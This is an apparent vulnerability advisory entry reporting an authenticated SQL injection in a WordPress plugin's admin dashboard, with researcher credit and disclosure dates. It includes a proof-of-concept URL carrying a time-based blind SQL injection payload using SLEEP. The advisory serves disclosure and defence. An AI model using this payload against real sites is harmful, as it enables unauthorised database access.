The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to an authenticated SQL Injections
https://example.com/wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1%20AND%20(SELECT%207953%20FROM%20(SELECT(SLEEP(5)))AgUn)
Shreya Pohekar of Codevigilant Project
Yes
2021-10-07 (about 10 months ago)
2021-10-07 (about 10 months ago)
2022-04-12 (about 4 months ago)